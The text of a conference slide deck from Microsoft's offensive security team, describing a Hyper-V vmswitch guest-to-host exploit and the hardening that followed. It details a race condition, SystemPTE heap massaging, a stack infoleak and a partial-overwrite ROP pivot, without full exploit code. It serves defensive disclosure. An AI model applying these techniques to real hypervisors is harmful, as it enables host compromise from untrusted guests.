Hardening Hyper-V through
offensive security research
Jordan Rabet, Microsoft OSR
Live demo!
Note: all vulnerabilities mentioned in this talk have been addressed
Hyper-V 101
3
Guest OSHost OS
Hardware
Guest OSHost OS
Kernel modeKernel mode
User modeUser mode
vmbus
Storage Physical memoryNetwork card
Hyper-V architecture: layout
CPUs …
Hypercalls Address manager MSRs …
4
Hypervisor
Storage Physical memoryNetwork card
storVSC
storVSP
I/O stack
foo.exe
I/O stack
Hyper-V architecture: accessing hardware resources from Guest OS
CPUs …
Hypercalls Address manager MSRs …
5
vmbus
Kernel modeKernel mode
User modeUser mode
Hardware
Guest OSHost OS
Hypervisor
vmbus internals: small packet
Physical addresses
(PA)
Guest Virtual
Addresses
(GVA)
Guest Physical
Addresses
(GPA)
System Virtual
Addresses
(SVA)
6
Kernel modeKernel mode Guest OSHost OS
Physical memory
Host physical
memory
Guest physical
memory
Shared virtual ringbufferShared virtual ringbuffer
System Physical
Addresses
(SPA)
VSC
vmbusvmbusr
VSP
Packet
Packet
Packet
Packet
Packet
vmbus internals: small packet passing a direct mapping (GPADL)
Packet PacketGPADL GPADL
Physical addresses
(PA)
Guest Virtual
Addresses
(GVA)
Guest Physical
Addresses
(GPA)
System Virtual
Addresses
(SVA)
7
Kernel modeKernel mode Guest OSHost OS
Physical memory
Host physical
memory
Guest physical
memory
Shared virtual ringbufferShared virtual ringbuffer
System Physical
Addresses
(SPA)
VSP case study: vmswitch
Storage Physical memoryNetwork card
netVSC
vmswitch
I/O stack
I/O stack
vmswitch: virtualized network provider
vmswitch is a VSP,
lives in host kernel
netVSC tunnels
traffic over to
vmswitch
CPUs …
Hypercalls Address manager MSRs …
9
vmbus
Kernel modeKernel mode
User modeUser mode
foo.exe
Hardware
Guest OSHost OS
Hypervisor
vmswitch emulates a
network card through
the RNDIS protocol
Guest OSHost OS Kernel modeKernel mode
Host physical
memory
Guest physical
memory
Physical memory
Receive BufferSend BufferReceive Buffer Send Buffer
vmbus messages
10
vmswitch: initialization sequence
Guest OSHost OS Kernel modeKernel mode
Receive buffer Send buffer
vmbus messages
…
netVSC
RNDIS
CMPLT
RNDIS
QUERY
11
vmswitch
vmswitch: sending RNDIS packets
Receive buffer Send buffer
Host OSKernel mode
vmswitch: how are RNDIS messages handled?
vmbus channel
RNDIS
SET
RNDIS MSG
queue
RNDIS worker thread 1
Channel
thread
RNDIS
CMPLT
RNDIS
CMPLT
RNDIS worker thread 2
vmswitch
12
RNDIS
QUERY
RNDIS
QUERY
RNDIS
CMPLT
RNDIS
SET
RNDIS
SET
RNDIS
CMPLT
SEND_RNDIS_PKT
SUBALLOC 0
SEND_RNDIS_PKT
SUBALLOC 2
RNDIS
QUERY
Initialization sequence vulnerability
Guest OSHost OS Kernel modeKernel mode
Host physical
memory
Guest physical
memory
Physical memory
Messing with the initialization sequence
Receive Buffer Pointer
GPADL 0 GPADL 1 GPADL 2GPADL 0 GPADL 1 GPADL 2
14
vmswitch receive buffer update
Receive buffer update isn’t atomic
1. Updates the pointer to the buffer
2. Generates and updates sub-allocations
No locking on the receive buffer
• It could be used in parallel
Update pointer to receive buffer
1
15
Generate bounds of sub-allocations
2
Update bounds of sub-allocations
3
Host OSKernel mode
vmswitch receive buffer update
GPADL 0
vmswitch vmbus channel
GPADL 1
Receive Buffer Pointer
16
Update pointer to receive buffer
1
Generate bounds of sub-allocations
2
Update bounds of sub-allocations
3
vmswitch receive buffer update
• During this short window, we can have
out-of-bound sub-allocations
• This results in a useful out-of-bounds
write if:
1. We can control the data being written
2. We can win the race
3. We can place a corruption target
adjacent to the receive buffer
Receive buffer race condition
GPADL 1
17
Update pointer to receive buffer
1
Generate bounds of sub-allocations
2
Update bounds of sub-allocations
3
Exploiting the vulnerability
Controlling what’s written out-of-bounds
Winning the race
Finding a reliable corruption target
?
?
?
Exploiting the vulnerability
Controlling what’s written out-of-bounds
Winning the race
Finding a reliable corruption target
?
?
?
Controlling the OOB write contents
• OOB write contents: RNDIS control message responses
• RNDIS_QUERY_MSG messages can return large buffers of data
20
Offset Size Field
0 4 MessageType
4 4 MessageLength
8 4 RequestId
12 4 Status
16 4 InformationBufferLength
20 4 InformationBufferOffset
Exploiting the vulnerability
Controlling what’s written out-of-bounds
Winning the race
Finding a reliable corruption target
?
?
Host OSKernel mode
vmswitch: handling RNDIS messages is asynchronous, but not really
vmbus channel
RNDIS MSG
queue
RNDIS worker thread 1
RNDIS
MSG 0
CMPLT
RNDIS worker thread 2
vmswitch
RNDIS
MSG 0
RNDIS
MSG 1
RNDIS
MSG 2
RNDIS
MSG 0
RNDIS
MSG 1
CMPLT
RNDIS
MSG 1
Waiting on MSG 0
ack from guest
Waiting on MSG 1
ack from guest
22
Channel
thread
Winning the race: delaying one RNDIS message?
• Can’t have RNDIS messages continuously write to the receive buffer
• But we don’t need continuous RNDIS messages – we just need one
• Can we send an RNDIS message and have it be processed in a delayed way?
• No by-design way of delaying RNDIS messages…
• …but not all messages require an ack from the guest
• Example: malformed RNDIS_KEEPALIVE_MSG message
• Idea: “cascade of failure”
• Block off all RNDIS worker threads
• Chain N malformed RNDIS_KEEPALIVE_MSG messages
• Append a single valid RNDIS message
23
Kernel mode
The Cascade Of Failure: making the host race itself
vmbus channel
RNDIS MSG
queue
RNDIS
MSG 0
CMPLT
vmswitch
RNDIS
MSG 0
RNDIS
MSG 1
CMPLT
RNDIS
MSG 1
Waiting on MSG 0
ack from guest
RNDIS
MSG 4
RNDIS
MSG 5
RNDIS
MSG 6
RNDIS
MSG 7
RNDIS
MSG 3
Host OS
RNDIS
MSG 8
CMPLT
RNDIS
MSG 8
Written to the receive buffer
after a controlled delay
Waiting on MSG 1
ack from guest
24
Channel
thread
RNDIS worker thread 1
RNDIS worker thread 2
Winning the race: configuring the delay
• We can delay the event by N time units, but what’s N’s value?
• We have a limited number of tries: need to be smart
• Can we distinguish between race attempt outcomes?
• If so we could search for the right N
• If we’re too early, increase N
• If we’re too late, decrease N
• If we’re just right… celebrate ☺
25
GPADL 0
Too early
Too late
Just right
RNDIS
CMPLT
26
GPADL 1
RNDIS
CMPLT
GPADL 1
RNDIS
CMPLT
Update pointer to receive buffer
1
Update bounds of sub-allocations
3
Exploiting the vulnerability
Controlling what’s written out-of-bounds
Winning the race
Finding a reliable corruption target?
Finding a target: other GPADL/MDLs and… stacks
0: kd> !address
...
ffffdd80`273bb000 ffffdd80`273c1000 0`00006000 SystemRange Stack Thread: ffffc903f188b080
ffffdd80`273c1000 ffffdd80`273c6000 0`00005000 SystemRange
ffffdd80`273c6000 ffffdd80`273cc000 0`00006000 SystemRange Stack Thread: ffffc903eed10800
ffffdd80`273cc000 ffffdd80`273cf000 0`00003000 SystemRange
ffffdd80`273cf000 ffffdd80`273d5000 0`00006000 SystemRange Stack Thread: ffffc903f182b080
ffffdd80`273d5000 ffffdd80`27606000 0`00231000 SystemRange
ffffdd80`27606000 ffffdd80`2760c000 0`00006000 SystemRange Stack Thread: ffffc903f181f080
ffffdd80`2760c000 ffffdd80`2760d000 0`00001000 SystemRange
ffffdd80`2760d000 ffffdd80`27613000 0`00006000 SystemRange Stack Thread: ffffc903ee878080
ffffdd80`27613000 ffffdd80`27625000 0`00012000 SystemRange
ffffdd80`27625000 ffffdd80`2762b000 0`00006000 SystemRange Stack Thread: ffffc903ee981080
ffffdd80`2762b000 ffffdd80`2762c000 0`00001000 SystemRange
ffffdd80`2762c000 ffffdd80`27632000 0`00006000 SystemRange Stack Thread: ffffc903f1bc64c0
...
28
Finding a target: kernel stacks
• Windows kernel stacks
• Fixed 7 page allocation size
• 6 pages of stack space
• 1 guard page at the bottom
• Allocated in the SystemPTE region
• Great corruption target if within range – gives instant ROP
• Problems
• How does the SystemPTE region allocator work?
• Can we reliably place a stack at a known offset from our receive buffer?
• Can we even “place” a stack? How do we spawn threads?
29
Allocation bitmap
• Bitmap based
• Each bit represents a page
• Bit 0 means free page, 1 means allocated
• Uses a “hint” for allocation
• Scans bitmap starting from hint
• Wraps around bitmap if needed
• Places hint at tail of successful allocations
• Bitmap is expanded if no space is found
SystemPTE allocator
Free page
Allocated page
Bitmap hint
30
Allocation bitmap
• Bitmap based
• Each bit represents a page
• Bit 0 means free page, 1 means allocated
• Uses a “hint” for allocation
• Scans bitmap starting from hint
• Wraps around bitmap if needed
• Places hint at tail of successful allocations
• Bitmap is expanded if no space is found
• Example 1: allocating 5 pages
SystemPTE allocator
Free page
Allocated page
Bitmap hint
31
Allocation bitmap
• Bitmap based
• Each bit represents a page
• Bit 0 means free page, 1 means allocated
• Uses a “hint” for allocation
• Scans bitmap starting from hint
• Wraps around bitmap if needed
• Places hint at tail of successful allocations
• Bitmap is expanded if no space is found
• Example 1: allocating 5 pages
• Example 2: allocating 5 pages again
SystemPTE allocator
Free page
Allocated page
Bitmap hint
32
Allocation bitmap
• Bitmap based
• Each bit represents a page
• Bit 0 means free page, 1 means allocated
• Uses a “hint” for allocation
• Scans bitmap starting from hint
• Wraps around bitmap if needed
• Places hint at tail of successful allocations
• Bitmap is expanded if no space is found
• Example 1: allocating 5 pages
• Example 2: allocating 5 pages again
• Example 3: allocating 17 pages
SystemPTE allocator
Free page
Allocated page
Bitmap hint
33
SystemPTE massaging: allocation primitives
• Receive/send buffers: can map any number of arbitrarily sized MDLs
• (“arbitrary”: still have size/number limits, but they’re pretty high)
• Some vmswitch messages use System Worker Threads
• NT-maintained thread pool
• More threads added to the pool when others are busy
• Idea: trigger many async tasks quickly in a row
• If enough are queued, more threads are spawned
• Helper: deadlock bug in async task lets us lock existing worker threads
• As a result: we can spray a handful of kernel stacks
34
Allocation bitmap
1. Spray 1MB buffers
2. Allocate a 2MB - 1 page buffer
• (SystemPTE expansions are done in 2MB steps)
3. Allocate a 1MB buffer
4. Allocate a 1MB - 7 pages buffer
5. Spray stacks
Two possible outcomes, both manageable
SystemPTE massaging strategy
Free page
Allocated page
Bitmap hint
35
Allocation bitmap
1. Spray 1MB buffers
2. Allocate a 2MB - 1 page buffer
• (SystemPTE expansions are done in 2MB steps)
3. Allocate a 1MB buffer
4. Allocate a 1MB - 7 pages buffer
5. Spray stacks
SystemPTE massaging strategy
Free page
Allocated page
Bitmap hint
Outcome #1
36
Allocation bitmap
1. Spray 1MB buffers
2. Allocate a 2MB - 1 page buffer
• (SystemPTE expansions are done in 2MB steps)
3. Allocate a 1MB buffer
4. Allocate a 1MB - 7 pages buffer
5. Spray stacks
SystemPTE massaging strategy
Free page
Allocated page
Bitmap hint
Outcome #1
37
Allocation bitmap
1. Spray 1MB buffers
2. Allocate a 2MB - 1 page buffer
• (SystemPTE expansions are done in 2MB steps)
3. Allocate a 1MB buffer
4. Allocate a 1MB - 7 pages buffer
5. Spray stacks
SystemPTE massaging strategy
Free page
Allocated page
Bitmap hint
Outcome #1
38
Allocation bitmap
1. Spray 1MB buffers
2. Allocate a 2MB - 1 page buffer
• (SystemPTE expansions are done in 2MB steps)
3. Allocate a 1MB buffer
4. Allocate a 1MB - 7 pages buffer
5. Spray stacks
SystemPTE massaging strategy
Free page
Allocated page
Bitmap hint
Outcome #1
39
Allocation bitmap
1. Spray 1MB buffers
2. Allocate a 2MB - 1 page buffer
• (SystemPTE expansions are done in 2MB steps)
3. Allocate a 1MB buffer
4. Allocate a 1MB - 7 pages buffer
5. Spray stacks
SystemPTE massaging strategy
Free page
Allocated page
Bitmap hint
Replaceable receive
buffer
Thread
stack
Outcome #1
40
Exploiting the vulnerability
Controlling what’s written out-of-bounds
Winning the race
Finding a reliable corruption target
Bypassing KASLR?
Bypassing KASLR
nvsp_message struct
• Represents messages sent to/from vmswitch over vmbus
43
struct nvsp_message {
struct nvsp_message_header hdr;
union nvsp_all_messages msg;
} __packed;
44
NVSP_MSG1_TYPE_SEND_
RNDIS_PKT_COMPLETE
NVSP_MSG1_TYPE_SEND_
NDIS_VER
UINT32 hdr.msg_type
UINT32 ndis_major_ver
UINT32 ndis_minor_ver
UINT32 hdr.msg_type
UINT32 status
sizeof(nvsp_message)
UINT32 hdr.msg_type
UINT32 ndis_major_ver
UINT32 ndis_minor_ver
UINT32 hdr.msg_type
UINT32 status
msg.send_ndis_ver msg.send_rndis_pkt_complete
nvsp_message
Infoleak UINT32 MessagetypeUINT32 hdr.msg_type
UINT32 status
32 uninitialized
stack bytes
45
• nvsp_message is allocated on the stack
• Only the first 8 bytes are initialized
• sizeof(nvsp_message) is returned
 32 bytes of uninitialized stack memory
are sent back to guest
 can leak a vmswitch return address
 we have enough to build a ROP chain
and overwrite a kernel thread stack!
Bypassing KASLR without an infoleak
• Our infoleak applied to Windows Server 2012 R2, but not Windows 10
• Oops
• How do we deal with KASLR without an infoleak?
• KASLR only aligns most modules up to a 0x10000 byte boundary
• As a result, partial overwrites are an option
• Example:
• Return address is: 0xfffff808e059f3be (RndisDevHostDeviceCompleteSetEx+0x10a)
• Corrupt it to: 0xfffff808e04b8705 (ROP gadget: pop r15; ret;)
• Can only do a single partial overwrite though… is that useful?
• Only one partial overwrite because our OOB write is contiguous
46
SystemPTE massaging
Free page
Allocated page
Replaceable receive
buffer
SystemPTE massaging
Thread
stack
Send buffer immediately
after target stack
47
Partial overwrite
• What if we use it to get RSP into our send
buffer?
• Target return address: 0xFFFFF808E059F3BE
• We corrupt it to: 0xFFFFF808E059DA32
• We end up doing RSP += 0xE78
• This moves RSP into our send buffer…
… which is shared with the guest
lea r11, [rsp+0E50h]
mov rbx, [r11+38h]
mov rbp, [r11+40h]
mov rsp, r11
...
ret
RSP
... …
FFFFC500F5FFF700 …
FFFFC500F5FFF800 0xFFFFF808E059DA32
FFFFC500F5FFF900 …
FFFFC500F5FFFA00 …
FFFFC500F5FFFB00 …
FFFFC500F5FFFC00 …
FFFFC500F5FFFD00 …
FFFFC500F5FFFE00 …
FFFFC500F5FFFF00 …
FFFFC500F6000000 00 00 00 00 00 00 00 00
FFFFC500F6000100 00 00 00 00 00 00 00 00
FFFFC500F6000200 00 00 00 00 00 00 00 00
FFFFC500F6000300 00 00 00 00 00 00 00 00
FFFFC500F6000400 00 00 00 00 00 00 00 00
FFFFC500F6000500 00 00 00 00 00 00 00 00
FFFFC500F6000600 00 00 00 00 00 00 00 00
FFFFC500F6000700 00 00 00 00 00 00 00 00
FFFFC500F6000800 00 00 00 00 00 00 00 00
FFFFC500F6000900
...
00 00 00 00 00 00 00 00
…
... …
FFFFC500F5FFF700 …
FFFFC500F5FFF800 0xFFFFF808E059F3BE
FFFFC500F5FFF900 …
FFFFC500F5FFFA00 …
FFFFC500F5FFFB00 …
FFFFC500F5FFFC00 …
FFFFC500F5FFFD00 …
FFFFC500F5FFFE00 …
FFFFC500F5FFFF00 …
FFFFC500F6000000 00 00 00 00 00 00 00 00
FFFFC500F6000100 00 00 00 00 00 00 00 00
FFFFC500F6000200 00 00 00 00 00 00 00 00
FFFFC500F6000300 00 00 00 00 00 00 00 00
FFFFC500F6000400 00 00 00 00 00 00 00 00
FFFFC500F6000500 00 00 00 00 00 00 00 00
FFFFC500F6000600 00 00 00 00 00 00 00 00
FFFFC500F6000700 00 00 00 00 00 00 00 00
FFFFC500F6000800 00 00 00 00 00 00 00 00
FFFFC500F6000900
...
00 00 00 00 00 00 00 00
…
48
Kernel thread
stack
Shared buffer
Host kernel stack in shared memory: what now?
1. The host CPU core throws a General Protection Fault (GPF)
• No KASLR bypass means the RET instruction will necessarily cause a fault
2. The address where the GPF happened is dumped to the stack
• In shared memory! We can read it, and that’s our KASLR bypass
3. Windows executes its GPF handler, still with the stack in shared memory
4. As attackers, we can:
1. Locate valid ROP gadget thanks to addresses being dumped to the stack
2. Manipulate the stack as the exception handler is being executed
• Includes exception records and of course other return addresses
5. As a result, we get ROP execution in host ☺
49
Demo time
Hardening Hyper-V
Vulnerability discovery
Exploitation
Post-exploitation
Breaking the chain
1
2
3
Targeted, continuous
internal code review
effort
Break exploit
techniques
Make components less
attractive targets,
invest in detection
Hardening: kernel stack isolation
To prevent overflowing into kernel stacks, we’ve moved them to their own region
0: kd> !address
...
ffffae8f`050a8000 ffffae8f`050a9000 0`00001000 SystemRange
ffffae8f`050a9000 ffffae8f`050b0000 0`00007000 SystemRange Stack Thread: ffffbc8934d51700
ffffae8f`050b0000 ffffae8f`050b1000 0`00001000 SystemRange
ffffae8f`050b1000 ffffae8f`050b8000 0`00007000 SystemRange Stack Thread: ffffbc8934d55700
ffffae8f`050b8000 ffffae8f`050b9000 0`00001000 SystemRange
ffffae8f`050b9000 ffffae8f`050c0000 0`00007000 SystemRange Stack Thread: ffffbc8934d59700
ffffae8f`050c0000 ffffae8f`050c1000 0`00001000 SystemRange
ffffae8f`050c1000 ffffae8f`050c8000 0`00007000 SystemRange Stack Thread: ffffbc8934d5d700
...
53
Hardening: other kernel mitigations
• Hypervisor-enforced Code Integrity (HVCI)
• Attackers can’t inject arbitrary code into Host kernel
• Kernel-mode Control Flow Guard (KCFG)
• Attackers can’t achieve kernel ROP by hijacking function pointers
• Work is being done to enable these features by default
• Future hardware security features: CET
• Hardware shadow stacks to protect return addresses and prevent ROP
54
Storage Physical memoryNetwork card
VMWP.exe
VSMB
I/O stack
Hyper-V architecture: virtualization providers can be in user-mode
CPUs …
Hypercalls Address manager MSRs …
55
vmbus
Kernel modeKernel mode
User modeUser mode
Hardware
Guest OSHost OS
Hypervisor
I/O stack
foo.exe
Hardening: VM Worker Process
• Improved sandbox
• Removed SeImpersonatePrivilege
• Improved RCE mitigations
• Enabled CFG export suppression
• Large reduction in number of valid CFG targets
• Enabled “Force CFG”
• Only CFG-enabled modules modules can be loaded into VMWP
• Several Hyper-V components being put in VMWP rather than kernel
56
The Hyper-V bounty program
• Up to $250,000 payout
• Looking for code execution, infoleaks and denial of service issues
• https://technet.microsoft.com/en-us/mt784431.aspx
• Getting started
• Joe Bialek and Nicolas Joly’s talk: “A Dive in to Hyper-V Architecture &
Vulnerabilities”
• Hyper-V Linux integration services
• Open source, well-commented code available on Github
• Good way to understand VSP interfaces and experiment!
• Public symbols for some Hyper-V components
57
Thank you for your time
Special thanks to Matt Miller, David Weston, the Hyper-V team, the
vmswitch team, the MSRC team and all my OSR buddies
58
BlueHat v18 || Hardening hyper-v through offensive security research
Appendix
Kernel modeKernel mode
User modeUser mode
Storage Physical memoryNetwork card
VMWP.exe
VSMB
Hyper-V architecture: VMWP compromise
Malicious guest
Host technically
compromised, but
limited to VMWP
user-mode
CPUs …
Hypercalls Address manager MSRs …
61
vmbus
Hardware
Guest OSHost OS
Hypervisor
Kernel modeKernel mode
User modeUser mode
Storage Physical memoryNetwork card
VMWP.exe
VSMB
Hyper-V architecture: VMWP to host kernel compromise
Malicious guest
Attacker escapes
user-mode through
local kernel, driver
exploit… NT
CPUs …
Hypercalls Address manager MSRs …
62
vmbus
Hardware
Guest OSHost OS
Hypervisor
Kernel modeKernel mode
User modeUser mode
Storage Physical memoryNetwork card
VMWP.exe
VSMB
Hyper-V architecture: VMWP to host kernel compromise
Malicious guest
Attacker goes for
host kernel directly
through VSP surface storVSP
CPUs …
Hypercalls Address manager MSRs …
63
vmbus
Hardware
Guest OSHost OS
Hypervisor
Kernel modeKernel mode
User modeUser mode
Storage Physical memoryNetwork card
VMWP.exe
VSMB
Hyper-V architecture: hypervisor compromise
Malicious guest
Attacker compromises
hypervisor, either
directly from guest or
through the host
CPUs …
Hypercalls Address manager MSRs …
64
vmbus
Hardware
Guest OSHost OS
Hypervisor
Guest OSHost OS Kernel modeKernel mode
Host physical
memory
Guest physical
memory
Physical memory
vmswitch initialization: NVSP_MSG5_TYPE_SUBCHANNEL
Subchannel 1 vmbus buffer
Subchannel 2 vmbus buffer
Subchannel 3 vmbus buffer
Receive Buffer
Send Buffer
Subchannel 1 vmbus buffer
Subchannel 2 vmbus buffer
Subchannel 3 vmbus buffer
Receive Buffer
Send Buffer
vmswitch initialization: NVSP_MSG1_TYPE_SEND_SEND_BUFvmswitch initialization: NVSP_MSG1_TYPE_SEND_RECV_BUFvmswitch initialization: NVSP_MSG1_TYPE_SEND_NDIS_VERvmswitch initialization: NVSP_MSG_TYPE_INIT
vmbus messages
65
Receive buffer Send buffer
Host OSKernel mode
vmswitch: how are RNDIS messages handled?
vmbus channel
Channel
message batch
RNDIS
SET
SEND_RNDIS_PKT
SUBALLOC 0
SEND_RNDIS_PKT
SUBALLOC 2
RNDIS MSG
queue
RNDIS worker thread 1
Channel
thread
RNDIS
CMPLT
RNDIS
CMPLT
RNDIS worker thread 2
vmswitch
66
RNDIS
QUERY
RNDIS
QUERY
RNDIS
CMPLT
RNDIS
SET
RNDIS
SET
RNDIS
CMPLT
SEND_RNDIS_PKT
SUBALLOC 0
SEND_RNDIS_PKT
SUBALLOC 2
RNDIS
QUERY
vmswitch messages
None
Initializing
HaltedOperational
RNDIS_INITIALIZE_MSG RNDIS_HALT_MSG
NVSP_MSG_TYPE_INIT
RNDIS_INITIALIZE_MSG
RNDIS_HALT_MSG
0
1
2 3
NVSP Message Type State # 0 1 2 3
NVSP_MSG_TYPE_INIT
NVSP_MSG1_TYPE_SEND_NDIS_VER
NVSP_MSG1_TYPE_SEND_RECV_BUF
NVSP_MSG1_TYPE_REVOKE_RECV_BUF
NVSP_MSG1_TYPE_SEND_SEND_BUF
NVSP_MSG1_TYPE_REVOKE_SEND_BUF
NVSP_MSG1_TYPE_SEND_RNDIS_PKT
NVSP_MSG5_TYPE_SUBCHANNEL
67
vmswitch state machine
vmswitch takeaways
• Send/receive buffers are used to transfer many messages at a time
• Opposite end needs to be prompted over vmbus to read from them
• vmswitch relies on different threads for different tasks
• vmbus dispatch threads
• Setup send/receive buffers, subchannels…
• Read RNDIS messages from send buffer
• The system worker threads
• Process RNDIS messages
• Write responses to receive buffer
• Subchannels only increase bandwidth in that they allow us to alert
the opposite end more often
68
vmswitch state machine
None
Initializing
HaltedOperational
RNDIS_INITIALIZE_MSG RNDIS_HALT_MSG
NVSP_MSG_TYPE_INIT
RNDIS_INITIALIZE_MSG
RNDIS_HALT_MSG
0
1
2 3
NVSP Message Type State # 0 1 2 3
NVSP_MSG_TYPE_INIT
NVSP_MSG1_TYPE_SEND_NDIS_VER
NVSP_MSG1_TYPE_SEND_RECV_BUF
NVSP_MSG1_TYPE_REVOKE_RECV_BUF
NVSP_MSG1_TYPE_SEND_SEND_BUF
NVSP_MSG1_TYPE_REVOKE_SEND_BUF
NVSP_MSG1_TYPE_SEND_RNDIS_PKT
NVSP_MSG5_TYPE_SUBCHANNEL
69
vmswitch state machine
NVSP Message Type State # 0 1 2 3
NVSP_MSG_TYPE_INIT
NVSP_MSG1_TYPE_SEND_NDIS_VER
NVSP_MSG1_TYPE_SEND_RECV_BUF
NVSP_MSG1_TYPE_REVOKE_RECV_BUF
NVSP_MSG1_TYPE_SEND_SEND_BUF
NVSP_MSG1_TYPE_REVOKE_SEND_BUF
NVSP_MSG1_TYPE_SEND_RNDIS_PKT
NVSP_MSG5_TYPE_SUBCHANNEL
• Easy way to win the race: queue up RNDIS
messages and keep having them write to
receive buffer continuously
• Doesn’t work: RNDIS threads blocked until ack from guest
• Ack and buffer replacement happen on same channel:
can’t happen simultaneously…
• …unless we use subchannels!
• Multiple channels = simultaneity
• …but we can’t because of the state machine
Winning the race:
continuous writing?
0 1
2
3
70
Winning the race: configuring the delay
• We can delay the event by N time units, but what’s N’s value?
• We have a limited number of tries: need to be smart
• Can we distinguish between race attempt outcomes?
• Yes
• If we’re too early, increase N
• If we’re too late, decrease N
• If we’re just right… celebrate ☺
• In practice we usually converge to the right N in <10 attempts
• N can vary from machine to machine and session to session
71
Finding a target: where’s our buffer?
• GPADL mapping
• GPADL PAs mapped into an MDL using VmbChannelMapGpadl
• MDL then mapped to VA space using MmGetSystemAddressForMdlSafe
• Where are MDLs mapped to? The SystemPTE region
• What’s mapped adjacent to our MDL?
• ...other MDLs
0: kd> !address @@c++(ReceiveBuffer)
Usage:
Base Address: ffffdd80`273d5000
End Address: ffffdd80`27606000
Region Size: 00000000`00231000
VA Type: SystemRange
72
Finding a target: allocation primitives
• Receive/send buffers: we can map an arbitrary number of arbitrarily sized MDLs
• (“arbitrary”: still have size/number limits, but they’re pretty high)
• Receive/send buffers: can be revoked
• NVSP_MSG1_TYPE_REVOKE_RECV_BUF and NVSP_MSG1_TYPE_REVOKE_SEND_BUF
• Since replacing buffers is a bug, we can only revoke the last one sent for each
• We have pretty good allocation and freeing primitives for manipulating the region
• But we need a way to allocate new stacks if we want to target them…
• Can we spray host-side threads?
73
Finding a target: stack allocation primitives
• vmswitch relies on System Worker Threads to perform asynchronous tasks
• NT-maintained thread pool
• Additional threads are added to the pool when all others are busy
• Basic idea: trigger an asynchronous task many times in rapid succession
• If enough tasks are queued quickly enough, threads will be spawned
• Several vmswitch messages rely on System Worker Threads
• In this exploit we use NVSP_MSG2_TYPE_SEND_NDIS_CONFIG
• Problem
• This method usually lets us create about 5 threads
• What if there are already a lot of threads in the system worker pool?
• Would be nice to be able to terminate them…
74
Finding a target: stack allocation primitives
• There’s no by-design way to terminate worker threads from a guest
• But there are bugs we can use! ☺
• NVSP_MSG1_TYPE_REVOKE_SEND/RECV_BUF
• Revocation done on system worker threads
• Deadlock bug: when multiple revocation messages handled, all but the last
system worker thread would be deadlocked forever
• We can use this to lock out an “arbitrary” number of system worker
threads
• We now have a limited thread stack spray!
75
Allocation bitmap
1. Spray 1MB buffers
2. Allocate a 2MB - 1 page buffer
• (SystemPTE expansions are done in 2MB steps)
3. Allocate a 1MB buffer
4. Allocate a 1MB - 7 pages buffer
5. Spray stacks
SystemPTE massaging strategy
Free page
Allocated page
Bitmap hint
Outcome #2
76
Allocation bitmap
1. Spray 1MB buffers
2. Allocate a 2MB - 1 page buffer
• (SystemPTE expansions are done in 2MB steps)
3. Allocate a 1MB buffer
4. Allocate a 1MB - 7 pages buffer
5. Spray stacks
SystemPTE massaging strategy
Free page
Allocated page
Bitmap hint
Outcome #2
77
Allocation bitmap
1. Spray 1MB buffers
2. Allocate a 2MB - 1 page buffer
• (SystemPTE expansions are done in 2MB steps)
3. Allocate a 1MB buffer
4. Allocate a 1MB - 7 pages buffer
5. Spray stacks
SystemPTE massaging strategy
Free page
Allocated page
Bitmap hint
Outcome #2
78
Allocation bitmap
1. Spray 1MB buffers
2. Allocate a 2MB - 1 page buffer
• (SystemPTE expansions are done in 2MB steps)
3. Allocate a 1MB buffer
4. Allocate a 1MB - 7 pages buffer
5. Spray stacks
SystemPTE massaging strategy
Free page
Allocated page
Bitmap hint
Outcome #2
79
Allocation bitmap
1. Spray 1MB buffers
2. Allocate a 2MB - 1 page buffer
• (SystemPTE expansions are done in 2MB steps)
3. Allocate a 1MB buffer
4. Allocate a 1MB - 7 pages buffer
5. Spray stacks
SystemPTE massaging strategy
Free page
Allocated page
Bitmap hint
Replaceable receive
buffer
Thread
stack
Outcome #2
80
Finding a target: SystemPTE massaging
• After massaging, we know a stack is at one of two offsets from the receive buffer
• Either 3MB - 6 pages away or 4MB - 6 pages away
• Since we can perform the race reliably, we can just try both possible offsets
• Note: doing the race requires revoking and re-mapping the receive buffer
• We can do this because the SystemPTE bitmap will free our 2MB block and reuse it for next
2MB block allocation
• As a result, we’re almost guaranteed to fall back into the same slot if we’re fast enough
• We can overwrite a stack, but what do we write?
• Overwriting return addresses requires a host KASLR bypass
• Easiest way to do this: find an infoleak vulnerability
81
Putting it all together
• We can leak 32 bytes of host stack memory
• We can leak a vmswitch return address
• With a return address we can build a ROP chain ☺
• Final exploit:
• Use infoleak to locate vmswitch
• Use information to build a ROP chain
• We don’t know for sure which stack we’re corrupting, so we prepend a ROP NOP-sled
• (that just means a bunch of pointers to a RET instructions in a row)
• Perform host SystemPTE massaging
• Use race condition to overwrite host kernel thread stack with ROP chain
82
What about security? Host OS mitigations
• Full KASLR
• Kernel Control Flow Guard
• Optional
• Hypervisor-enforced code
integrity (HVCI)
• Optional
• No sandbox
Host OS kernel
• ASLR
• Control Flow Guard (CFG)
• Arbitrary Code Guard (ACG)
• Code Integrity Guard (CIG)
• Win32k lockdown
VM Worker Process
83

More Related Content

PDF
BlueHat v18 || Straight outta v mware - modern exploitation of the svga devic...
PDF
BlueHat v18 || A mitigation for kernel toctou vulnerabilities
PDF
Kernel Recipes 2015 - Porting Linux to a new processor architecture
PDF
Xen Debugging
PDF
Linux kernel debugging
PDF
Kernel Recipes 2015 - Kernel dump analysis
PPTX
The Silence of the Canaries
PPT
Linux Crash Dump Capture and Analysis
BlueHat v18 || Straight outta v mware - modern exploitation of the svga devic...
BlueHat v18 || A mitigation for kernel toctou vulnerabilities
Kernel Recipes 2015 - Porting Linux to a new processor architecture
Xen Debugging
Linux kernel debugging
Kernel Recipes 2015 - Kernel dump analysis
The Silence of the Canaries
Linux Crash Dump Capture and Analysis

What's hot (20)

PDF
CSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_mark
PDF
FreeBSD and Drivers
PDF
Kernel Recipes 2019 - Hunting and fixing bugs all over the Linux kernel
PDF
VLANs in the Linux Kernel
ODP
Linux kernel debugging(ODP format)
PDF
Lock free programming- pro tips
PDF
Kernel Recipes 2015: Anatomy of an atomic KMS driver
PDF
LCU14 209- LLVM Linux
PPTX
Testing CAN network with help of CANToolz
PPTX
Dead Lock Analysis of spin_lock() in Linux Kernel (english)
PDF
Kernel Recipes 2015 - Hardened kernels for everyone
PDF
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
PDF
Kernel Recipes 2019 - CVEs are dead, long live the CVE!
PDF
Kernel_Crash_Dump_Analysis
PDF
Linux Kernel Debugging Essentials workshop
PPTX
Linux Network Stack
PDF
Debugging linux kernel tools and techniques
PDF
Kernel Recipes 2015: Introduction to Kernel Power Management
PDF
